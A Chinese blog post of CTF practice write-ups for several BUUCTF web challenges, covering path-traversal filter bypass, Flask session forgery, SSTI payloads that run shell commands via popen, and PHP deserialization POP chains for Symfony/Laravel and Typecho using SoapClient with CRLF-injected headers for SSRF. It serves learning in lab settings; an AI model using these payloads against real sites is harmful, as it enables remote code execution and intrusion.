刷题(第二周)

于 2023-03-06 18:56:30 发布
阅读量535 收藏
点赞数
分类专栏: 刷题日记 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/129267382
版权

目录

virink_2019_files_share

[PASECA2019]honey_shop

中途的插曲

[watevrCTF-2019]Supercalc

[b01lers2020]Scrambled

[CISCN2019 总决赛 Day1 Web4]Laravel1

[MRCTF2020]Ezpop_Revenge

 分析路径

还有一个点就是为什么字符串链接,没有指向,就会跳到别的类呢

[pasecactf_2019]flask_ssti

virink_2019_files_share

打开界面看一下源码,  以为直接访问就出了,发现直接重定向到了根目录,呃呃呃就知道不会这么简单。

 发现了/uploads/favoicon.ico这是一个文件,访问./uploads目录,

burp扫一下发现了 发现了一个get传参首先考虑任意文件读取漏洞,

 发现从/etc/passwd   --->\/epasswd ,所以可以发现过滤了一些东西。

加了n个../发现成功了,这时候就想到一开始那个flag目录的提示了, 

这里卡了一下,忘记了,需要双写re,这里加flag是因为前面的是个目录。 

[PASECA2019]honey_shop

打开界面发现,需要1337才可以获取flag但我们只有1336,然后session解码看一下

 到了这里我们的思路变成了如何获得密钥然后伪造cookie,

这里我从源码看见download,然后考虑是否有任意文件下载漏洞,

 

查看坏境看见了密钥, 

中途的插曲

本来都看见当前的进程是app.py了,但是读取就是出不来 提示禁止了,然后才用的environ 

[watevrCTF-2019]Supercalc

打开界面之后发现,输入算式就会给出来结果。

首先找找给出了哪些信息,源码没什么有用的信息,看一下Network

 发现有session,用脚本解码一下,

{"history":[{"code":"6 / 5"},{"code":"6 / 5"}]} 里面就是我们输入的东西并且执行了

 一般这种都会是一个ssti的漏洞,但是这道题{{7*7}}

Check your syntax m8,{%7*7%},报语法错误,猜测禁用了{{}}

然后让这个程序报错,会不会爆出有用的信息。

 然后我到了这里就不会了,只能爬师傅们的文章

看完之后,这里虽然报错了,但还是返回了1/0我们输入的值,因为flask框架是基于python语言的,所以师傅们用的方法是#注释掉后面的,

会发现后面的会正常执行,1/0#{{config}},查看配置信息,发现了密钥 这里我本来的想法为什么不能直接,

{{"".__class__.__bases__[0]. __subclasses__()[138].__init__.__globals__['popen']('dir').read()}}

试了之后有报错,难搞,说明只能通过密钥伪造cookie

{'history':[{'code':'__import__(\"os\").popen(\"ls -a\").read()'}]}

 然后读取flag

[b01lers2020]Scrambled

打开界面发现一个超链接 的视频,源码并无异常。

这里我是看到了cookie中的异常, 

kxkxkxkxsh0b29kxkxkxkxsh  中间得四位是通过刷新不断变化的,0b29比如这里,第29个字符就是b则28就是0,也是一道脑洞题。

import requests
import re
import time

url = 'http://cd3f66b1-2a6e-4f68-bcf0-3942ea117454.node4.buuoj.cn:81/'
res = requests.session()
r = res.get(url, headers={'Cookie': 'frequency=1; transmissions=kxkxkxkxsh0b29kxkxkxkxsh'})
flag = [0] * 100  #这里是创建了100个数组
fflag = ''
for i in range(100):  # 这里最好是要100此,难免会出现重复的transmissions导致最后的结果错误
    time.sleep(0.1)
    r = res.get(url)
    cookies = r.cookies
    ans = str(cookies['transmissions'])
    ans = ans.replace('kxkxkxkxsh', '').replace('%7B', '{').replace('%7D', '}')
    print(ans)#9724
    index = ans[2:]   #比如是 3632  则会 输出 32
    print(index)#24
    print(ans[1])#7
    flag[int(index)] = ans[1]   #flag[24]=7
    flag[int(index) - 1] = ans[0]#flag[23]=9
    print("-------loading-------")

# for i in range(100):
#     fflag += str(flag[i])
#
# print(fflag)
#

[CISCN2019 总决赛 Day1 Web4]Laravel1

打开直接给出了源码,看来是需要我们构造序列化的东西。

所以我们直接全局搜索__dustruct,

 虽然去除掉了一部分但还是真的多,

通过逐个分析找到一个可以文件包含的链,

TagAwareAdapter类:   

 

这里的this->pool是我们可以控制的,所以找出一个恶意类中的 saveDeferred方法即可,最终找到了PhpArrayAdapter.php中的方法, 

控制this->values=null,就可以执行initialize(),  里面有include $this->file,所以我们可以包含/flag来获取。

构造exp

<?php
 
namespace Symfony\Component\Cache\Adapter{
 
    use Symfony\Component\Cache\CacheItem;
    class PhpArrayAdapter{
        private $file='/flag';
    }
 
    class TagAwareAdapter{
        private $deferred = [];
        private $pool;
        public function __construct()
        {
            $this->deferred = array('flight' => new CacheItem());
            $this->pool = new PhpArrayAdapter();
        }
    }
}
 
namespace Symfony\Component\Cache{
    class CacheItem{}
}
 
namespace {
 
    use Symfony\Component\Cache\Adapter\TagAwareAdapter;
    $obj = new TagAwareAdapter();
    echo urlencode(serialize($obj));
}

  use Symfony\Component\Cache\CacheItem;为什么要用这个类呢,那是因为

$item变量是,CacheItemInterface是一个接口不能实例化,所以用了他一个子类Cacheitem可以实例化。 感悟:代码审计的题的确非常需要耐心一个个看,所以做题应该静下心来,思路:找出可以利用的方法比如,include/file_get_contents等,然后找出__destruct起点一步步观察。

[MRCTF2020]Ezpop_Revenge

首先了解原生类SoapClient,调用一个不存在的函数,回去调用__call方法

<?php
try {
    $a = new SoapClient(null, array('uri' => 'aaa', 'location' => 'http://ip:5656'));
    $a->function();
} catch (SoapFault $e) {
}

$a->function()这里的,function方法是不存在的所以就会调用call方法,然后会在本地显示 

 回归正文

打开题目了以后,蒙了,扫目录发现了www.zip,下载为源码

首先看一下flag.php

<?php
if(!isset($_SESSION)) session_start();
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
   $_SESSION['flag']= "MRCTF{******}";
}else echo "我扌your problem?\nonly localhost can get flag!";
?>

 判断ip是不是本地,如果是的话,把flag存入session中,可以想到ssrf然后最后肯定是需要访问flag.php把flag包含进session中。

给出了php源码,一般来说都是__destruct 和__wakeup入手,全局搜索

发现有两个__destruct都是对文件 的一些删除等操作,没有利用价值。

搜索__wakeup,HelloWorld\Plugin.php中

<?php
if (!defined('__TYPECHO_ROOT_DIR__')) exit;
/**
 * Hello World
 * 
 * @package HelloWorld 
 * @author qining
 * @version 1.0.0
 * @link http://typecho.org
 */
class HelloWorld_DB{
    private $flag="MRCTF{this_is_a_fake_flag}";
    private $coincidence;
    function  __wakeup(){
        $db = new Typecho_Db($this->coincidence['hello'], $this->coincidence['world']);
    }

    public function action(){
        if(!isset($_SESSION)) session_start();
        if(isset($_REQUEST['admin'])) var_dump($_SESSION);
        if (isset($_POST['C0incid3nc3'])) {
			if(preg_match("/file|assert|eval|[`\'~^?<>$%]+/i",base64_decode($_POST['C0incid3nc3'])) === 0)
				unserialize(base64_decode($_POST['C0incid3nc3']));
			else {
				echo "Not that easy.";
			}
        }
    }
}

         $db = new Typecho_Db($this->coincidence['hello'], $this->coincidence['world']);

里面的两个参数我们可以控制,根进去看一下

 Typecho\Db.php

  public function __construct($adapterName, $prefix = 'typecho_')
    {
        /** 获取适配器名称 */
        $this->_adapterName = $adapterName;

        /** 数据库适配器 */
        $adapterName = 'Typecho_Db_Adapter_' . $adapterName;
//字符串链接会触发 __tostring

因为$adapterName是我们传进去的$this->coincidence['hello'] 所以可控,

那么我们就可以找一下__tostring方法

  public function __toString()
    {
        switch ($this->_sqlPreBuild['action']) {
            case Typecho_Db::SELECT:
                return $this->_adapter->parseSelect($this->_sqlPreBuild);
            case Typecho_Db::INSERT:
                return 'INSERT INTO '
                . $this->_sqlPreBuild['table']
                . '(' . implode(' , ', array_keys($this->_sqlPreBuild['rows'])) . ')'
                . ' VALUES '
                . '(' . implode(' , ', array_values($this->_sqlPreBuild['rows'])) . ')'
                . $this->_sqlPreBuild['limit'];
            case Typecho_Db::DELETE:

return $this->_adapter->parseSelect($this->_sqlPreBuild);

new SoapClient(null, array('uri' => 'aaa', 'location' => 'http://ip:5656'))->function);

这两种的形式是一样的,所以我们就可以用soapClient

<?php

class Typecho_Db_Query
{
    private $_sqlPreBuild;
    private $_adapter;

    public function __construct()
    {
        $target = 'http://127.0.0.1/flag.php';
        $headers = array(
            'X-Forwarded-For: 127.0.0.1',
            'Cookie: PHPSESSID=arvkb8pr8macu0u406pp7grmr3'
        );
        $b = new SoapClient(null,array('location' => $target,'user_agent'=>'HyyMbb^^'.join('^^',$headers),'uri'      => "aaab"));
        $this->_sqlPreBuild =array("action"=>"SELECT");
        $this->_adapter = $b;
    }
}


class HelloWorld_DB
{
    private $coincidence;

    public function __construct()
    {
        $this->coincidence = ["hello" => new Typecho_Db_Query()];
    }
}

$a = new HelloWorld_DB();
$aaa = serialize($a);
$aaa = str_replace('^^',"\r\n",$aaa);
$aaa = str_replace('&','&',$aaa);
echo base64_encode($aaa);

 分析路径

我们访问了page_admin路径,那么这个哪来的呢 

我要要用action()中的方法,而代码中都没引用,那么猜测会有路由指向,

var/Typecho/Plugin.php这里可以用全局搜索,addRoute,或者搜索路径+类名也可以

public static function activate($pluginName)
{
    self::$_plugins['activated'][$pluginName] = self::$_tmp;
    self::$_tmp = array();
    Helper::addRoute("page_admin_action","/page_admin","HelloWorld_Plugin",'action');
}

 这句代码的意思就是访问/page_admin的时候,会自动加载HelloWorld_Plugin类,而且会自动调用action函数,所以我们输入点的路由为/page_admin

还有一个点就是为什么字符串链接,没有指向,就会跳到别的类呢

<?php
class k{
    public $str;
    public $abc;
    public function __construct()
    {
        echo  "进行了construct";
        $abc =new a();
        $str='sfsf'.$abc;
    }




}
class a{
   public function __toString()
   {
       echo "tostring";
      echo "44444444";
   }
}
$s=new k();
echo $s;

结果:进行了construct       tostring      44444444,非常神奇。

这里提示一点就是:s->S  S可以后面和16进制,\00

参考链接:MRCTF2020 web Ezpop_Revenge 简单记录 - CodeAntenna 

[pasecactf_2019]flask_ssti

def encode(line, key, key2):
    return ''.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line)))

app.config['flag'] = encode('', 'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W34', 'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT5')

 上面这个其实就是解密脚本,一开始就给出了,但还是自己做做

{{""["\x5f\x5fclass\x5f\x5f"]}}  "".__class__
{{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbase\x5f\x5f"]["\x5f\x5fsubclassed\x5f\x5f"]()}} "".__class__.__base__.__subclasses__() 

{{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbase\x5f\x5f"]["\x5f\x5fsubclasses\x5f\x5f"]()[127]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["popen"]("cat ap*")["read"]()}}

 因为是ssti肯定需要一步步构造,然后查找127

os._wrap_close我们可以利用,然后ls  ls /唉没flag,但是看见了app.py文件,所以我觉得里面肯定有东西
import random
from flask import Flask, render_template_string, render_template, request
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = 'folow @osminogka.ann on instagram =)'

#Tiaonmmn don't remember to remove this part on deploy so nobody will solve that hehe
'''
def encode(line, key, key2):
    return ''.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line)))

app.config['flag'] = encode('', 'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3', 'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT')
'''

def encode(line, key, key2):
    return ''.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line)))

file = open("/app/flag", "r")
flag = file.read()

app.config['flag'] = encode(flag, 'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3', 'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT')
flag = ""

os.remove("/app/flag")

nicknames = ['˜”*°★☆★_%s_★☆★°°*', '%s ~♡ⓛⓞⓥⓔ♡~', '%s Вêчңø в øĤлâйĤé', '♪ ♪ ♪ %s ♪ ♪ ♪ ', '[♥♥♥%s♥♥♥]', '%s, kOтO®Aя )(оТеЛ@ ©4@$tьЯ', '♔%s♔', '[♂+♂=♥]%s[♂+♂=♥]']

@app.route('/', methods=['GET', 'POST'])
# 需要请求方式为POST才能get到nickname
def index():
    if request.method == 'POST': 
        try:
            p = request.values.get('nickname')
            id = random.randint(0, len(nicknames) - 1)
            if p != None:
                if '.' in p or '_' in p or '\'' in p:
                    return 'Your nickname contains restricted characters!'
                return render_template_string(nicknames[id] % p) # 注入

        except Exception as e:
            print(e)
            return 'Exception'

    return render_template('index.html') 

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=1337)

从源码很容易发现,加密手段

def encode(line, key, key2):
    return ''.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line)))
 

并且是通过异或来搞的,异或可以逆向出来,解密脚本=加密脚本

flag=3
a=4
b=5
print(flag^4^5)    2
print(2^4^5)     3

 然后我们就可以把从config 中的flag,进行解码

 这里为何访问{{config}}那是因为,app.config['flag'] = encode('', 'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3', 'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT')  config的赋值

def encode(line, key, key2):
    return ''.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line)))  #加密的方式


flag='-M7\x10wG:66S+k/\x0e\x1b\r?\x0e(D\x1e\x1c_\x17xoS`\x02Y\x13Yq\x03z-Ei\x10\x06IG'

flag=encode(flag,'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3', 'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT')
print(flag)

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf (Do_you_know_http)
Glacier_Mount的博客
06-27 2342
burp suite的简单应用
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3866
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
crypto-Des-MMXX(b01lers ctf 2020)
耐酸碱高温固化材料近距离传输研究
12-02 462
看清楚加密逻辑之后其实可以看出来,2020轮DES加密的前1010轮只和dk的低2020bit有关(也就是只和SECRET值高20bit有关),后1010轮只和dk的高2020bit有关(也就是只和SECRET值低20bit有关)。当已知明文和密文的情况下,将明文加密前1010轮得到的值应该等于将密文解密后1010轮得到的值相同。根据SECRET = 0xa########e ,即需要枚举高位中缺失的16bit和低位中缺失的16bit,找到正确的高位值和低位值。对称密码题,记录一下。
CTF新手,请问从本地访问flag!
热门推荐
algae
08-04 8万+
本地访问加header 127.0.0.1 http://123.206.87.240:8002/localhost/ burpsuite(强大,但麻烦,有点慢) 抓包加上下面一句话 X-Forwarded-For: 127.0.0.1 (或者client-ip: 127.0.0.1,不同题不一样) ip(简单快捷) 3. header(个性化定制头) 4.hackbar(最快) http://123.206.31.85:1003/ ...
BUUCTF [PASECA2019] honey_shop
Senimo
12-21 1526
BUUCTF [PASECA2019] honey_shop 考点: Flask中的Session伪造 /environ记录当前进程的环境变量信息 /proc/self其路径指向当前进程 启动环境: 是一个蜂蜜商店的界面,有1366美金,想要购买flag需要1337美金: 直接购买提示金额不足: 猜测可能是传参时存在金额参数或者cookie中,使用BurpSuite抓取数据包: 其中item应该为商品序号,获取到其中的session: session=eyJiYWxhbmNlIjoxMzM2LC
程序员考试刷题-Week01:第一周的讲义
07-07
程序员考试刷题CSCI 1103 计算机科学一级荣誉 2019 年秋季 波士顿学院 演讲笔记 第 1 周 本星期: CSCI 1103 是关于什么的 课程管理与后勤 编码物流 OCaml:基本类型; 文字和表达式; 简化和工作; 价值观 图书馆 1...
程序员考试刷题-Week01:第01周的材料
07-07
程序员考试刷题CSCI 1103 计算机科学 1 荣誉 2020 年秋季 罗伯特穆勒 - 波士顿学院 演讲笔记 星期 本星期: CSCI 1103 是关于什么的 课程管理与后勤 编码物流 OCaml:基本类型; 文字和表达式; 简化和工作; 价值观...
520_学习总结_第二周1
08-08
第二周的学习总结中,主要涵盖了哈希表、映射集合、图、二叉树、递归、分治和回溯等核心概念。这些知识在IT领域,尤其是编程和算法设计中扮演着重要角色。 哈希表是一种数据结构,通过哈希函数将元素映射到特定...
第一周算法总结1
08-08
在第一周的算法学习中,我们主要聚焦于基础的数据结构和解题策略。数据结构是算法的基石,它决定了如何高效地存储和处理数据。以下是本周学习的知识点概览: 1. **数据结构**:数据结构是用来组织和管理数据的方式...
leetcode刷题账号-leetcode:leetcode
07-06
leetcode刷题账号 Leet Code 每日刷 LeetCode 题目我会定时更新一些,数组、链表、栈、队列、二叉树等经典题目 解法会从遍历、递归、动态规划等逐步展开 ...第二周,二叉树 第三周,二分法 第四周,链表 第五周,Array
Linux的/proc/self/学习
cjdgg的博客
08-23 7590
Linux的/proc/self/学习 最近做的[SWPU2019]Web3和[pasecactf_2019]flask_ssti好像都涉及到了/proc这个目录,所以找篇文章来学习下,看了这篇文章才发现作者是搬运之前我就关注的一个大佬WHOAMI的文章,之前复现漏洞看的就是大佬的文章,这会回去看才发现大佬的博客好像关了,这也让我下定决心要把自己所学的东西记录下来,就算是搬运也要自己记录下来,一昧的收藏文章哪天大佬们把博客关了那就真的GG了。话不多说进入正题 /proc目录 Linux 内核提供了一种通过
CTFHUB-SSRF-POST请求
qq_62078839的博客
04-23 1630
打开连接 尝试读取flag.php与index.php flag.php <?php error_reporting(0); if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") { echo "Just View From 127.0.0.1"; return; } $flag=getenv("CTFHUB"); $key = md5($flag); if (isset($_POST["key"]) && $_P...
每天一道ctf
whisper921的博客
10-28 914
有这样一行代码
CISCN final 几道web题总结
weixin_30376453的博客
07-30 230
因为都有源码,所以这里直接从源码开始分析: 1.Easy web 这道题本来的意思应该是通过注入来load_file读取config.php来泄露cookie的加密密钥,从而伪造身份进行登陆再上传shell 这里本来addslashes以后就基本没法注入,但是这里却多了两行替换,所以能够继续注入, 这里config过滤可以使用16进制或者char编码绕过: ...
[CISCN2019 总决赛 Day1 Web4]Laravel1
fightte的博客
05-21 792
[CISCN2019 总决赛 Day1 Web4]Laravel1 界面如上,比较单一: 指出了反序列化的点:还有备份文件。 下面反序列化的入口: 就当找到了吧: 确实可以跳转: 可控: 寻找这个类,看是否被调用: 开始寻找使用了saveDeferred类的: 看别人的WP这个是唯一可以使用的: 调用了本类的initialise方法,但前文并没有定义,据其他WP说是会去父类找, 偷一张其继承关系的图: 查询得到其主要父类,尝试全局搜索initialise() include可以使用: 那么在之前的那个
BUU刷题记录——7
weixin_43610673的博客
02-20 3474
[b01lers2020]Space Noodles 根据页面提示,POST访问 按照提示访问最后拼接字符串即可 [网鼎杯 2020 半决赛]faka 关键字:未授权,任意文件读取 /admin 进入后台登录页面 下载源码审计,由于已经发现了后台地址,先查看application/admin/controller/Index.php,看看能否以admin身份登录 可以看到pass()方法中有着诸多验证项,而下面的info()并无要求 未登录无session,id不传值得话就可以进入if语句,跟进_fo
[校赛] - Web - ezPop
1tachi的博客
12-03 1806
终于做出校赛级别的题了,好难 这是一个简单的pop链构造,难就难在他有五个类,一个干扰类,剩下四个可以有三种以上做法
Buuctfweb(五)
qq_50589021的博客
12-14 6627
Greatphp 使用 Error/Exception 内置类绕过哈希比较 可见,需要进入eval()执行代码需要先通过上面的if语句: if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ) 这个乍看一眼在ctf的基础题目中非常常见,一般情况下只需要使
[ctf学习]ctfhub技能树-web
小飒的博客
07-05 1729
背景知识 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 方法 1、OPTIONS 返回服务器针对特定资源所支持的HTTP请求方法,也可以利用向web服务器发送‘*’的请求来测试服务器的功能性 2、HEAD 向服务器索与GET请求相一致的响应,只不过响应体将不会被返回。这一方法可以再不必传输整个响应内容的情况下,就可以获取包含在响应小消息头中的元信息。 3、GET 向特定的资源发出请求。注意:GET方法不应当被用于产生“副作用”的操作中,例如在Web A
杭电oj刷题第二阶段答案2081
最新发布
05-22
多组数据,每组数据第一行是一个整数n(1),表示有n个数需要放。接下来一行n个整数ai(1),表示需要放的数。 输出格式 每组数据输出一行,表示最多能放多少个数。 样例输入 3 2 3 5 5 2 3 4 7 12 样例输出 3 2 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值